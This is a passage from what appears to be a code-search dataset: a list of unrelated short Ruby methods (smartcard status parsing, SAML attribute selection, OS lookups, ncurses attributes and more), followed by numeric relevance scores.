"def proc_descr ( code = proc_code )\n proc = Procedure.find_by(code: code )\t \n return proc.descr rescue '' \n end",
"def format_rule_process\n XES::Trace.new.tap do |trace|\n trace.concept_name = \"rule_process %s\" % Util::UUID.generate\n trace.attributes << XES.string(\"pione:traceType\", \"rule_process\")\n trace.events = @rule_process_log.records.map do |record|\n XES::Event.new.tap do |event|\n # standard attributes\n event.concept_name = record.name\n event.org_resource = record.caller\n event.time_timestamp = record.timestamp\n event.lifecycle_transition = record.transition\n\n # pione extension attributes\n event.attributes << XES.string(\"pione:ruleType\", record.rule_type)\n end\n end\n end\n end",
"def gp_get_status(scope, query_aid = [])\n scope_byte = { :issuer_sd => 0x80, :apps => 0x40, :files => 0x20,\n :files_modules => 0x10 }[scope]\n data = Asn1Ber.encode [{:class => :application, :primitive => true,\n :number => 0x0F, :value => query_aid}]\n apps = [] \n first = true # Set to false after the first GET STATUS is issued.\n loop do\n raw = iso_apdu :cla => 0x80, :ins => 0xF2, :p1 => scope_byte,\n :p2 => (first ? 0 : 1), :data => [0x4F, 0x00]\n if raw[:status] != 0x9000 && raw[:status] != 0x6310 \n raise Smartcard::Iso::ApduException, raw\n end\n \n offset = 0\n loop do\n break if offset >= raw[:data].length\n aid_length, offset = raw[:data][offset], offset + 1\n app = { :aid => raw[:data][offset, aid_length] }\n offset += aid_length\n \n if scope == :issuer_sd\n lc_states = { 1 => :op_ready, 7 => :initialized, 0x0F => :secured,\n 0x7F => :card_locked, 0xFF => :terminated }\n lc_mask = 0xFF\n else\n lc_states = { 1 => :loaded, 3 => :installed, 7 => :selectable,\n 0x83 => :locked, 0x87 => :locked }\n lc_mask = 0x87\n end\n app[:lifecycle] = lc_states[raw[:data][offset] & lc_mask]\n\n permission_bits = raw[:data][offset + 1]\n app[:permissions] = Set.new()\n [[1, :mandated_dap], [2, :cvm_management], [4, :card_reset],\n [8, :card_terminate], [0x10, :card_lock], [0x80, :security_domain],\n [0xA0, :delegate], [0xC0, :dap_verification]].each do |mask, perm|\n app[:permissions] << perm if (permission_bits & mask) == mask\n end\n offset += 2\n \n if scope == :files_modules\n num_modules, offset = raw[:data][offset], offset + 1\n app[:modules] = []\n num_modules.times do\n aid_length = raw[:data][offset]\n app[:modules] << { :aid => raw[:data][offset + 1, aid_length] }\n offset += 1 + aid_length \n end\n end\n \n apps << app\n end\n break if raw[:status] == 0x9000\n first = false # Need more GET STATUS commands.\n end\n apps\n end",
"def get_os_attrs(source, attr, source_type)\n begin\n # grab the product name from the template we are current provisioning from\n if source_type == 'prov'\n os_name = source.source.operating_system.product_name rescue nil\n elsif source_type == 'vm'\n os_name = source.operating_system.product_name rescue nil\n else\n raise \"Invalid source_type input\"\n end\n\n log(:info, \"get_os_attrs: Returning Operating System attribute <#{attr}> for Operating System <#{os_name}>\")\n # first we must truncate the product name in a camel case format\n # e.g. Red Hat Enterprise Linux 6 = RedHatEnterpriseLinux6\n truncated_product_name = os_name.split('(').first.delete(' ')\n\n # return the requested attribute\n $evm.instantiate(\"#{OS_CLASS}/#{truncated_product_name}\")[attr]\n rescue => err\n log(:error, \"get_os_attrs: <#{err}>: Unable to return proper attribute <#{attr}> from os_name <#{os_name}>. Returning nil.\")\n return nil\n end\nend",
"def program_params\n params[:program]\n end",
"def calc_program_name project_symbol\n camel_to_snake_case(project_symbol).downcase\n end",
"def commandType\n result = \"\"\n if (@currentCommand.slice(0) == \"@\")\n result = \"A_COMMAND\"\n else\n result = \"C_COMMAND\"\n end\n return result\n end",
"def share_type(val)\n stypes = %W{ DISK PRINTER DEVICE IPC SPECIAL TEMPORARY }\n stypes[val] || 'UNKNOWN'\n end",
"def compare_scr\n line = Array.new\n @attribute_all.each_value{|const|\n const[1].each{|line,data|\n data.SDC.each{|sdc|\n sdc_tmp = sdc.gsub(\"\\*\",\"\").split[2].slice(2..1000)\n @RPT_ERR.each{|key,err|\n sig_tmp = err.SignalName.gsub(\"\\*\",\"\")\n if err.AttributeName == sdc.split[0] && sig_tmp == sdc_tmp\n data.ConstCheckFlag = 0\n data.SynthesisReport = err.Message\n noapply = Array.new\n noapply << line\n noapply << data.SDC\n noapply << err.Message\n @RPT_ErrorList << noapply\n end\n }\n }if data.SDC != nil\n }\n }\n end",
"def findFCName()\n doc = Hpricot::XML(open('Summary.xml'))\n fcName = \"\"\n (doc/:'ChipSummary').each do|summary|\n runFolder = (summary/'RunFolder').inner_html\n\n run = runFolder[/([a-zA-Z0-9]+)$/]\n\n if run.match(/^FC/)\n fcName = run.slice(2, run.size)\n else\n fcName = run\n end\n end\n # For HiSeqs, a flowcell is prefixed with letter \"A\" or \"B\".\n # We remove this prefix from the reduced flowcell name, since\n # a flowcell name is entered without the prefix letter in LIMS.\n # For GA2, there is no change.\n fcName.slice!(/^[a-zA-Z]/)\n return fcName\n end",
"def get_nameprog_swversion\r\n nomeprog = APP_CUPERATIVA_NAME\r\n ver_prog = CuperativaGui.sw_version_to_int\r\n return nomeprog, ver_prog\r\n end",
"def user_attributes_class\n return SAML::UserAttributes::SSOe if issuer&.match(/eauth\\.va\\.gov/)\n\n case authn_context\n when 'myhealthevet', 'myhealthevet_multifactor'\n SAML::UserAttributes::MHV\n when 'dslogon', 'dslogon_multifactor'\n SAML::UserAttributes::DSLogon\n when 'multifactor', 'dslogon_loa3', 'myhealthevet_loa3', LOA::IDME_LOA3, LOA::IDME_LOA1\n SAML::UserAttributes::IdMe\n else\n Raven.tags_context(\n authn_context: authn_context,\n controller_name: 'sessions',\n sign_in_method: 'not-signed-in:error'\n )\n raise 'InvalidAuthnContext'\n end\n end",
"def program_specific_validators\n return eh_program_specific_validators if product_test.reporting_program_type == 'eh'\n return ep_program_specific_validators if product_test.reporting_program_type == 'ep'\n\n []\n end",
"def pidof(program)\n pids = []\n full = cmd_exec('ps -elf').to_s\n full.split(\"\\n\").each do |pid|\n pids << pid.split(' ')[3].to_i if pid.include? program\n end\n pids\n end",
"def consultation_modes\n\t\thuman_attribute_names_if_present *CONSULTATION_MODES\n\tend",
"def cr_dmi_system\n return {} if @node.automatic_attrs[\"dmi\"].nil? || @node.automatic_attrs[\"dmi\"][\"system\"].nil?\n\n @node.automatic_attrs[\"dmi\"][\"system\"]\n end",
"def s_situational\n SegmentReqs_::Situational\n end",
"def which_suite()\n ret_val = case suite\n when \"H\" then \"Heart\"\n when \"C\" then \"Club\"\n when \"D\" then \"Diamond\"\n when \"S\" then \"Spades\"\n end\n ret_val\n end",
"def application_type\n return 'CH1606' if @application.chapter1606\n end",
"def attributes_for_code(code, code_system)\n @attributes.find_all { |e| e.send(:code) == code && e.send(:code_obj).send(:system) == code_system }\n end",
"def resource_type(resource)\n resource.xpath('string(command/ident/@value)')\n end",
"def resource_type(resource)\n resource.xpath('string(command/ident/@value)')\n end",
"def getDayProcessObjName\r\n\t\t\treturn \"mfiforce__Day_Process__c\"\r\n\t\tend",
"def get_key\n os = $driver.capabilities.platform.to_s.upcase\n if os.to_s == 'WINDOWS' || os.to_s == 'LINUX'\n return 'control'\n elsif os.to_s == 'DARWIN'\n return 'command'\n else\n raise 'Invalid OS'\n end\nend",
"def state\n results = (nodetool_netstats || '').split(\"\\n\")\n results.map! { |line| line.strip }\n results.select! { |line| line.include? 'Mode:' }\n results.map! { |line| line.split(':')[1] }\n results.compact!\n return nil if results.size != 1\n results.first.strip.downcase.to_sym\n end",
"def event_type\n @attributes[:event_type]\n end",
"def get_instance_system(code)\n return code[1][1]\n end",
"def review_mode\n if chronos_capacity_volume == 0\n \"paused\"\n elsif review_mail_recurrency\n \"mail\"\n else\n \"no_mail\"\n end\n end",
"def get_mode\n prompt = ''\n @transport.cmd('') { |c| prompt += c }\n match = /(?<hostname>[^\\(-\\)]+)(\\((?<text>[\\w\\-]+)\\))?(?<char>#|>)/.match(prompt)\n\n mode = nil\n\n if match && match['char']\n\n mode = case match['char']\n when '>' then :user\n when '#' then :privileged\n end\n\n end\n\n if match && match['text']\n mode = match['text'].to_sym\n end\n\n mode\n end",
"def get_rca_for_current_brd\n if is_broadcaster?\n sql = \"SELECT dg_rca.title FROM data_gateway as dg INNER JOIN data_group_rca as dg_rca on dg_rca.id = dg.rca_id\n WHERE dg.broadcast_id = #{self.sys_user_resource_broadcasts.first.broadcast_id} limit 1 \"\n rca_name = ActiveRecord::Base.connection.execute(sql).to_a\n rca_name = rca_name[0].present? && rca_name[0][0].present? ? rca_name[0][0] : \"null\"\n else\n \"null\"\n end\n end",
"def eval_service_provider_id\n service_provider_id = \"-\"\n if eob && eob.provider_npi.present?\n service_provider_id = eob.provider_npi\n elsif eob && eob.provider_tin.present?\n service_provider_id = eob.provider_tin\n elsif (!eob.blank? && !eob.claim_information.blank? && eob.claim_information.provider_npi.present?)\n service_provider_id = eob.claim_information.provider_npi\n elsif (!eob.blank? && !eob.claim_information.blank? && eob.claim_information.provider_ein.present?)\n service_provider_id = eob.claim_information.provider_ein\n elsif facility.facilities_npi_and_tins.present?\n service_provider_id = get_facility_npi_and_tin\n end\n service_provider_id\n end",
"def pdb_get_os(facts)\n if facts.is_a?(Hash) && !facts['operatingsystem'].nil? && !facts['operatingsystem']['value'].nil?\n os = facts['operatingsystem']['value']\n Puppet.info(\"#{log_prefix} puppet os for node is: os=#{os}\")\n if os.downcase == 'windows'\n os = 'Windows'\n elsif os.downcase == 'centos'\n os = 'CentOS'\n end\n\n Puppet.info(\"#{log_prefix} fiendly puppet os for node is: os=#{os}\")\n os\n else\n \"Unknown\"\n end\n end",
"def get_random_program_type\n DataUtility.select_random_from_options(@prng, ProgramType.all).key\n end",
"def resourceType\n 'RiskEvidenceSynthesis'\n end",
"def set_claim_type(proc_state)\n if proc_state == 'MANUAL_VAGOV'\n receiving_pension = false\n\n if Flipper.enabled?(:dependents_pension_check)\n pension_response = bid_service.get_awards_pension\n receiving_pension = pension_response.body['awards_pension']['is_in_receipt_of_pension']\n end\n\n if receiving_pension\n @end_product_name = 'PMC eBenefits School Attendance Reject'\n @end_product_code = '130SCAEBPMCR'\n else\n @end_product_name = 'eBenefits School Attendance Reject'\n @end_product_code = '130SCHEBNREJ'\n end\n end\n end",
"def combined_process_name(process_name)\n process_name[PROCESS_NAME_REGEX,1]\n end",
"def combined_process_name(process_name)\n process_name[PROCESS_NAME_REGEX,1]\n end",
"def combined_process_name(process_name)\n process_name[PROCESS_NAME_REGEX,1]\n end",
"def form_type(application)\n {\n CH33_30: 'CH33',\n CH33_1606: 'CH33',\n CH33_1607: 'CH33',\n CH1606: 'CH1606',\n CH30: 'CH30',\n CH32: 'CH32'\n }[application.form.to_sym]\n end",
"def get_other_fusion_guest_os(options)\n guest_os = \"otherguest\"\n return guest_os\nend",
"def get_attrib str\n return FFI::NCurses::A_NORMAL unless str\n # next line allows us to do a one time conversion and keep the value\n # in the same variable\n if str.is_a? Integer\n if [\n FFI::NCurses::A_BOLD,\n FFI::NCurses::A_REVERSE, \n FFI::NCurses::A_NORMAL,\n FFI::NCurses::A_UNDERLINE,\n FFI::NCurses::A_STANDOUT, \n FFI::NCurses::A_DIM, \n FFI::NCurses::A_BOLD | FFI::NCurses::A_REVERSE, \n FFI::NCurses::A_BOLD | FFI::NCurses::A_UNDERLINE, \n FFI::NCurses::A_REVERSE | FFI::NCurses::A_UNDERLINE, \n FFI::NCurses::A_BLINK\n ].include? str\n return str\n else\n raise ArgumentError, \"get_attrib got a wrong value: #{str} \"\n end\n end\n\n\n att = nil\n str = str.downcase.to_sym if str.is_a? String\n case str #.to_s.downcase\n when :bold\n att = FFI::NCurses::A_BOLD\n when :reverse\n att = FFI::NCurses::A_REVERSE \n when :normal\n att = FFI::NCurses::A_NORMAL\n when :underline\n att = FFI::NCurses::A_UNDERLINE\n when :standout\n att = FFI::NCurses::A_STANDOUT\n when :bold_reverse\n att = FFI::NCurses::A_BOLD | FFI::NCurses::A_REVERSE\n when :bold_underline\n att = FFI::NCurses::A_BOLD | FFI::NCurses::A_UNDERLINE\n when :dim\n att = FFI::NCurses::A_DIM \n when :blink\n att = FFI::NCurses::A_BLINK # unlikely to work\n else\n att = FFI::NCurses::A_NORMAL\n end\n return att\n end",
"def read_attributes(data)\n count = data.read_vint\n count.times do\n usage = data.read_uint8\n case usage\n when 0x00, 0x02, 0x03, 0x30, 0xa1..0xaf\n @attributes << { usage: usage, data: data.read_hex(32) }\n when 0x20\n @attributes << { usage: usage, data: data.read_hex(20) }\n else\n # TODO: Parse into plain string?\n @attributes << { usage: usage, data: data.read_hex }\n end\n end\n end",
"def getxattrs\n # # file: Scissor_Sisters_-_Invisible_Light.flv\n # user.m.options=\"-c\"\n\n cmd = %w[getfattr -d -m - -e base64] + [realpath.to_s]\n\n attrs = {}\n\n IO.popen(cmd, \"rb\", :err=>[:child, :out]) do |io|\n io.each_line do |line|\n if line =~ /^([^=]+)=0s(.+)/\n key = $1\n value = $2.from_base64 # unpack base64 string\n # value = value.encode(\"UTF-8\", \"UTF-8\") # set string's encoding to UTF-8\n value = value.force_encoding(\"UTF-8\").scrub # set string's encoding to UTF-8\n # value = value.encode(\"UTF-8\", \"UTF-8\") # set string's encoding to UTF-8\n\n attrs[key] = value\n end\n end\n end\n\n attrs\n end",
"def print_primary_attributes\n \"Strenght(STR):#{str}, Dexterity(DEX):#{dex}, Inteligence(INT):#{int}, Constitution(CON):#{con}, Appearence(APP):#{app}, Power(POW):#{pow}, Size:#{siz}, Education:#{edu}\"\n end",
"def type\n # If we know for sure its a backup\n if self.p_s_b == \"B\"\n return \"Backup\"\n else\n pmr = self.pmr\n param = self.to_param\n # Otherwise, try and figure out\n case param\n when pmr.primary_param\n return \"Primary\"\n when pmr.secondary_1_param\n return \"Sec 1\"\n when pmr.secondary_2_param\n return \"Sec 2\"\n when pmr.secondary_3_param\n return \"Sec 3\"\n else\n return \"Backup\"\n end\n end\n end"
] | [
"0.56413835",
"0.5547117",
"0.55038613",
"0.5410344",
"0.54024947",
"0.54024947",
"0.53961504",
"0.5374258",
"0.53301316",
"0.5328355",
"0.52793306",
"0.52515835",
"0.5239102",
"0.52355474",
"0.52233654",
"0.52154016",
"0.52050954",
"0.52020055",
"0.51988494",
"0.5191708",
"0.5179819",
"0.5164628",
"0.51469576",
"0.50200915",
"0.5014339",
"0.5013788",
"0.50042444",
"0.49865514",
"0.4984254",
"0.49798208",
"0.49750498",
"0.49676982",
"0.49583632",
"0.49528864",
"0.49504885",
"0.49349907",
"0.4924587",
"0.49136338",
"0.48878103",
"0.48827356",
"0.4870449",
"0.4864816",
"0.4864816",
"0.48646745",
"0.48640937",
"0.486356",
"0.486356",
"0.4861394",
"0.4856388",
"0.4854514",
"0.48539585",
"0.48530415",
"0.48507366",
"0.48431873",
"0.48369685",
"0.48315522",
"0.48263255",
"0.48119044",
"0.4808534",
"0.48070693",
"0.4806538",
"0.48064747",
"0.48003978",
"0.47918418",
"0.4791466",
"0.47914532",
"0.47820437",
"0.47750297",
"0.47679356",
"0.4765788",
"0.47654673",
"0.47644085",
"0.47628286",
"0.47626343",
"0.47615907",
"0.47511742",
"0.47511742",
"0.4749971",
"0.47482616",
"0.47474918",
"0.47426698",
"0.47374532",
"0.4733395",
"0.472638",
"0.47206503",
"0.47201702",
"0.47190046",
"0.47181413",
"0.47169825",
"0.47169676",
"0.47156224",
"0.47155476",
"0.47155476",
"0.47144222",
"0.47080687",
"0.4704217",
"0.4703341",
"0.4693119",
"0.46918884",
"0.46912578"
] | 0.7315199 | 0 |
returns either 'Active', 'Reserves' or 'National Guard' based on the service branch | def convert_to_service_component(service_branch)
service_branch = service_branch.downcase
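    # note: the checks below are order-sensitive; a branch string containing both
    # "reserves" and "national guard" maps to 'Reserves' because that check runs first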
return 'Reserves' if service_branch.include?('reserves')
return 'National Guard' if service_branch.include?('national guard')
'Active'
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def branch_of_service\n SERVICE_BRANCHES[branch_of_service_code]\n end",
"def hca_branch_of_service\n HCA_SERVICE_BRANCHES[branch_of_service_code] || 'other'\n end",
"def get_branch \n branch = case @os_svninfo['URL']\n when /trunk/ then \"trunk\"\n when /branches\\/private\\/([^\\/]+)/ then $1\n when /branches\\/([^\\/]+)/ then $1\n when /patches\\/([^\\/]+)/ then $1\n when /tags\\/([^\\/]+)/ then $1\n else fail(\"Can't determine which branch I'm operating on\")\n end\n branch\n end",
"def determine_branch_type(branch)\n return branch if (branch.downcase == \"develop\")\n branch =~ /^([a-zA-Z]+)-/\n if $1 && (%w(rc hotfix).member? $1.downcase)\n return $1.downcase\n else\n raise \"unrecognised branch prefix in '#{branch}'. Should be hotfix or rc\"\n end\nend",
"def get_vehicle_status\n if (@age < 5)\n return \"a service.\"\n end\n return \"to be scrapped.\"\n end",
"def current_branch\n return @branch unless @branch.blank?\n @branch = case @svninfo.url\n when /trunk/ then \"trunk\"\n when /branches\\/private\\/([^\\/]+)/ then $1\n when /branches\\/([^\\/]+)/ then $1\n when /tags\\/([^\\/]+)/ then $1\n else @config_source[\"branch\"]\n end \n @branch || \"unkown\"\n end",
"def branch\n Branch[comparable.segments.first(2).join('.')]\n end",
"def status\n branch&.status\n end",
"def status\n if canceled.present?\n return 'canceled'\n elsif returned.present?\n return 'returned'\n elsif due_back?\n return 'due back'\n elsif shipped.present?\n return 'shipped'\n elsif authorized\n return 'placed'\n else\n return 'placed'\n end\n end",
"def branch_name\n if name.in?(['Cole Taylor Bank', 'MB Financial Bank, N.A.'])\n sfx = Channel.consumer_direct.identifier.eql?(channel) ? ' CD' : ''\n \"MB #{city}#{sfx}\"\n else\n name\n end\n end",
"def component_branch(cmp)\n component(cmp).fetch('branch', CONF_DEFAULT_BRANCH)\nend",
"def component_branch(cmp)\n component(cmp).fetch('branch', CONF_DEFAULT_BRANCH)\nend",
"def branch_type\n data['branch-type']\n end",
"def state_group\n state = @current_policy ? @current_policy.tax_state_abbr : @company_info.hq_state\n case state\n when nil\n 'All'\n when 'CA'\n 'California'\n else\n 'non_California'\n end\n end",
"def status\n if status_code.present?\n if status_code['HL7 ActStatus']\n status_code['HL7 ActStatus'].first()\n elsif status_code['SNOMED-CT']\n case status_code['SNOMED-CT'].first()\n when '55561003'\n 'active'\n when '73425007'\n 'inactive'\n when '413322009' \n 'resolved'\n end\n end\n end\n end",
"def status_str\n case self.status\n when ACTIVE\n \"Active\"\n when INACTIVE\n \"Inactive\"\n when CLOSED\n \"Closed\"\n when NO_STRIPE\n \"No Stripe Account\"\n when UNKNOWN\n \"Unknown\"\n else\n \"Invalid\"\n end\n end",
"def get_reservation_status(reservation)\n owner = reservation.item_owner\n case reservation.status\n when \"pending_owner\"\n is_current_user?(owner) ? \"awaiting_acceptance_from_you\" : \"awaiting_acceptance_from_other_party\"\n when \"pending_reserver\"\n is_current_user?(owner) ? \"awaiting_acceptance_from_other_party\" : \"awaiting_acceptance_from_you\"\n else\n \"reservation_\" + reservation.status\n end \n end",
"def list_status\n if self.available_on.nil?\n nil\n elsif self.tba?\n 'TBA'\n elsif self.upcoming?\n 'Upcoming'\n elsif self.new?\n 'New'\n elsif self.recent?\n 'Recent'\n elsif self.backlist?\n 'Backlist'\n else\n nil\n end\n end",
"def state_or_province\n end",
"def state_or_province\n end",
"def derive_branch_name\n @config[:git][:branch] == 'preview' ? preview_branches.last : @config[:git][:branch]\n end",
"def status\n if caberawit?\n 'caberawit'\n elsif praremaja?\n 'praremaja'\n elsif remaja?\n 'remaja'\n elsif dewasa?\n 'dewasa'\n end\n end",
"def furnished_status_lookup(code)\n case code.to_i\n when 0 then 'Furnished'\n when 1 then 'Part Furnished'\n when 2 then 'Un-Furnished'\n when 3 then 'Not Specified'\n when 4 then 'Furnished / Un-Furnished'\n else nil\n end\n end",
"def get_status\n if draft\n :draft\n elsif closed || gross_amount <= paid_amount\n :closed\n elsif due_date and due_date > Date.today\n :opened\n else\n :overdue\n end\n end",
"def branch\n @env.fetch( :branch, \"N/A\" )\n end",
"def service_code\n \"#{shipment_mode_code}#{service_type_code}#{services_code}\"\n end",
"def branch_name\n $repo.current_branch\n end",
"def billing_state\n if deployments.any? { |d| d.billing_state == 'prepaid' }\n 'prepaid'\n else\n 'expired'\n end\n end",
"def branch \n extra[\"branch\"] \n end",
"def branch\n (@options[:branch] || 'master').to_s\n end",
"def branch\n (@options[:branch] || 'master').to_s\n end",
"def getMatchGitBranch(org_id)\n conf = loadIOSConfigFile(org_id)\n return conf['match_git_branch']\nend",
"def get_branch(status = `git status`)\n branch = nil\n if match = Regexp.new(\"^# On branch (.*)\").match(status)\n branch = match[1]\n end\nend",
"def brand\n cc_type\n end",
"def status_codes\n get_info :production_status\n end",
"def branch_name_value(branch_index=1)\n if @match_data.nil? || @match_data[branch_index].nil?\n branch_name = value_of_or_default(params[:branch_field], 'branch')\n else\n branch_name = @match_data[branch_index]\n end\n end",
"def get_merchant_status\n\t\tstatus = 'Pending'\n\t\tif self.paid?\n\t\t\tstatus = \"Paid\"\n\t\telsif self.fullfilled?\n\t\t\tstatus = \"Fullfilled\"\n\t\telsif self.cancelled?\n\t\t\tstatus = \"Cancelled\"\n\t\tend\n\t\tstatus\n\tend",
"def determine_branch_or_tag_name(repo)\n name = \"\"\n type = :none\n\n # first check if repo is in detached HEAD state\n if repo.head_detached?\n # check if current commit has a tag\n repo.tags.each do |tag|\n if tag.target.oid == repo.head.target_id\n name = tag.name\n type = :tag\n break\n end\n end\n\n # check if we got a tag name, otherwise it's a wild commit\n if type == :none\n name = repo.head.target_id[0..7]\n type = :commit\n end\n else\n # HEAD is not detached, so we are in a branch\n name = $branch_name\n type = :branch\n end\n\n return { name: name, type: type }\nend",
"def current_branch; end",
"def current_branch; end",
"def branchname\n @branchname ||= self.branch.name\n end",
"def company_code\n if self.yard.present? && self.yard.facility.present? && self.yard.facility.country.present?\n country = self.yard.facility.country\n \"COPART#{country.code}\".upcase\n else\n \"\"\n end\n end",
"def get_status\n if draft\n :draft\n elsif paid\n :paid\n elsif due_date\n if due_date > Date.today\n :pending\n else\n :overdue\n end\n else\n # An invoice without a due date can't be overdue\n :pending\n end\n end",
"def fetch_pre_decision_status\n if pending_schedule_hearing_task?\n :pending_hearing_scheduling\n elsif hearing_pending?\n :scheduled_hearing\n elsif evidence_submission_hold_pending?\n :evidentiary_period\n elsif at_vso?\n :at_vso\n elsif distributed_to_a_judge?\n :decision_in_progress\n else\n :on_docket\n end\n end",
"def state_s\n # return \"审核中\" if approving?\n return \"等待激活中\" if unapproved?\n return \"审核被拒绝\" if rejected?\n return \"展示中\" if opened? and available?\n return \"高亮展示中\" if highlighted? and opened? and available?\n return \"已过期\" if !available?\n return \"未展示\" if closed?\n end",
"def brand_name\n maintenance_record_hub.try(:brand) || car.try(:brand_name)\n end",
"def status\n\t\t\tif `svstat #{@svcdir}` =~ /: (up|down)/\n\t\t\t\tst = $1.to_sym\n\t\t\t\tst = :unmonitored if GOD and st == :down\n\t\t\telse\n\t\t\t\tst = :unknown\n\t\t\tend\n\t\t\tst\n\t\tend",
"def status\n short_state_str=SHORT_VM_STATES[state_str]\n\n if short_state_str==\"actv\"\n short_state_str=SHORT_LCM_STATES[lcm_state_str]\n end\n\n short_state_str\n end",
"def determine_branch_name(repo)\n name = \"\"\n repo.branches.each do |branch|\n if branch.head?\n name = branch.name\n break\n end\n end\n return name\nend",
"def status\n short_state_str=SHORT_VM_STATES[state_str]\n\n if short_state_str=='actv'\n short_state_str=SHORT_LCM_STATES[lcm_state_str]\n end\n\n short_state_str\n end",
"def build_your_team?\n return \"DONE\" if (set_budget? == \"DONE\") && (user.team.has_leadplace_agent?) \n return \"INPROC\" if (set_budget? == \"DONE\") && (!user.team.has_leadplace_agent?)\n return nil\n end",
"def branch\n case @vcs\n when 'github'\n if @data.key? 'ref'\n @data['ref'].sub('refs/heads/', '')\n else\n @data['repository']['default_branch']\n end\n when 'gitlab'\n @data['ref'].sub('refs/heads/', '')\n when 'bitbucket-server'\n @data['changes'][0]['refId'].sub('refs/heads/', '')\n when 'bitbucket'\n return @data['push']['changes'][0]['new']['name'] unless deleted?\n\n @data['push']['changes'][0]['old']['name']\n when 'stash'\n @data['refChanges'][0]['refId'].sub('refs/heads/', '')\n when 'tfs'\n @data['resource']['refUpdates'][0]['name'].sub('refs/heads/', '')\n end\n end",
"def company_brand_code\n self.dig_for_string(\"agentSummary\", \"office\", \"brandCode\")\n end",
"def current_branch\n hg('branch').to_s.strip\n end",
"def status\r\n if @status == \"paid\"\r\n :completed\r\n elsif @tatus == \"refused\"\r\n :refused\r\n else\r\n :pending_payment\r\n end\r\n end",
"def get_brand(brand)\n case brand\n when \"master\"\n return \"mastercard\"\n when \"american_express\"\n return \"amex\"\n else\n return brand\n end\n end",
"def order_status(order_status)\n stat_name = ''\n if order_status == 'deliver'\n stat_name = 'Entregada'\n elsif order_status == 'in_route'\n stat_name = 'Reparto'\n elsif order_status == 'rejected'\n stat_name = 'Rechazada'\n elsif order_status == 'pending'\n stat_name = 'Pendiente'\n elsif order_status.nil?\n stat_name = 'No tiene estado'\n end\n stat_name\n end",
"def active_status\n\tif active\n\t return \"active\"\n\tend\n\treturn \"inactive\"\n end",
"def state_code\n @object.headquarters.try(:state_code)\n end",
"def status\n if closed?\n return \"closed\"\n elsif submitted?\n return retrieved? ? \"retrieved\" : \"submitted\"\n else\n \"new\"\n end\n end",
"def branch_name\n ENV['TRAVIS_BRANCH'] || ENV['CI_BRANCH']\n end",
"def branch_name\n @branch_name ||= ENV['GIT_BRANCH'] || `git rev-parse --abbrev-ref HEAD`.chomp\n end",
"def status_name\n STATUSES[status]\n end",
"def status\n if params['fraud_status'] == 'pass' || params['credit_card_processed'] == 'Y'\n 'Completed'\n elsif params['fraud_status'] == 'wait'\n 'Pending'\n else\n 'Failed'\n end\n end",
"def court_division\n case(court)\n when \"superior\"\n \"Suffolk County Civil\"\n when /^bmc/\n court_name\n else\n \"N/A\"\n end\n end",
"def home_or_away(team_name)\n game_hash[team_name][:status]\nend",
"def current_branch\n git.branch.name\n end",
"def branch\n if request.args.first == \"list\"\n request.args[1]\n else\n request.args.first\n end\n end",
"def status_string\n case status\n when APPROVED_STATUS\n \"approved\"\n when REJECTED_STATUS\n \"rejected\"\n when REMOVED_STATUS\n \"removed\"\n when PENDING_STATUS\n \"pending\"\n else\n \"error\"\n end\n end",
"def billed_or_paid?\n status == PAID || status == BILLED\n end",
"def brand\n cc_type\n end",
"def stage\n case @stage\n when \"hgt-com\"\n :hgt_com\n when \"hgt-par\"\n :hgt_par\n when \"hgt-tot\"\n :hgt_tot \n end\n\n\n end",
"def state_abbrev\n # user_state = self.addresses.first.state.name\n # REGIONS.named(user_state).code\n return self.addresses.first.state.abbrev_name unless self.addresses.first.nil?\n '-'\n end",
"def status\n if @object.deadpooled_on\n 'deadpooled'\n elsif @object.acquired_by.any?\n 'acquired'\n elsif @object.initial_public_offering.present?\n 'IPOed'\n else\n 'alive'\n end\n end",
"def calculated_status\n if deliveries.any? {|delivery| delivery.status == \"not_sent\" }\n \"not_sent\"\n elsif deliveries.any? {|delivery| delivery.status == \"unknown\" }\n \"unknown\"\n elsif deliveries.any? {|delivery| delivery.status == \"hard_bounce\" }\n \"hard_bounce\"\n elsif deliveries.any? {|delivery| delivery.status == \"soft_bounce\" }\n \"soft_bounce\"\n elsif deliveries.all? {|delivery| delivery.status == \"delivered\" }\n \"delivered\"\n else\n raise \"Unexpected situation\"\n end\n end",
"def current_branch\n repo.branches.find(&:head?)\n end",
"def find_branch(repo, branch)\n name, num = branch.split('-')\n\n variations = [ branch, \"#{name}#{num}\", \"#{name}_#{num}\" ]\n\n branches = %x( cd #{repo} ; git branch --list ).gsub('*', '').split(\"\\n\")\n branches.each do |b|\n b.strip!\n variations.each do |v|\n return b if (b == v)\n end\n end\n\n return nil\nend",
"def status_name\n STATUSE.key(@status)\n end",
"def branch\n `git rev-parse --abbrev-ref HEAD`.strip.presence\n rescue\n nil\n end",
"def service\n if origin_url =~ /github/i\n 'github'\n elsif origin_url =~ /bitbucket/i\n 'bitbucket'\n elsif origin_url =~ /stash/i\n 'stash'\n else\n ''\n end\n end",
"def patient_status_str\n case self.status\n when 0\n return 'New visit' \n when 7 \n return 'Cancelled' \n when 3..5 \n return 'Complete' \n else\n return 'In Process'\n end\n end",
"def status_sym\n if self.stars_final.present?\n return :completed\n else\n if self.primary_program_budge?\n if self.day_of_budge.present? and self.day_of_budge < 1\n if self.day_of_budge == 0\n return :ready_to_start # Ready to be moved to day 1\n else\n return :needs_reviving # Start them on a new budge (determine best place)\n end\n elsif self.day_starts_at.present? and self.day_starts_at > Time.now.utc\n return :scheduled\n else\n old_time_zone = Time.zone\n Time.zone = self.program_player.user.time_zone_or_default\n if self.last_completed_date.present? and self.last_completed_date >= Time.zone.today\n Time.zone = old_time_zone\n return :caught_up\n else\n Time.zone = old_time_zone\n if self.days_late <= 3\n return :in_progress\n else\n return :time_up\n end\n end\n end\n else\n return :unknown\n end\n end\n end",
"def update_clinician_status\n binding.pry\n #(region.eql? \"India\") && (speciality.eql? \"dentist\")\n if region == \"India\" && speciality != \"dentist\"\n self.status = \"active\"\n end\n return nil\n end",
"def booking_status\n 'Confirmed'\n end",
"def get_status_name\n\n return Team.status_name(self.status)\n end",
"def status\n statuses = []\n transactions.where(action: 'purchase').each do |t|\n statuses << (t.is_refunded ? 'Refunded' : 'Valid')\n end\n if statuses.uniq.length > 1\n 'Partially Refunded'\n else\n (statuses.uniq == ['Refunded']) ? 'Fully Refunded' : 'Valid'\n end\n end",
